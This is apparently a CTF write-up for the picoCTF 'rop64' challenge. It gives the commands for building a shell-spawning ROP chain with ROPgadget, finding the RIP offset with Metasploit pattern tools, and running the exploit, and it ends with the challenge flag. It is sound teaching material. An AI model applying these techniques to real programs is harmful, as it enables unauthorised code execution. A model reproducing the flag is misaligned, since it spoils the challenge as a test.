ctftime

My solutions for various CTF challenges

View on GitHub

rop64

Binary Exploitation - Points: 400

Time for the classic ROP in 64-bit. Can you exploit this program to get a flag?

vuln

vuln.c

Use ROPgadget to find a ROP chain that spawns a shell.

$ ROPgadget --binary vuln --ropchain

Find the offset where the overflowing buffer writes to the RIP. Create a pattern and use it in gdb to find the address where the SEGFAULT occurs.

$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x6241396141386141
  [*] Exact match at offset 24

Execute the ROP chain from ROPgadget with the correct padding of 24 to get a shell that lets you cat flag.txt.

$ (python2 sol.py; cat) | ./vuln

flag: picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}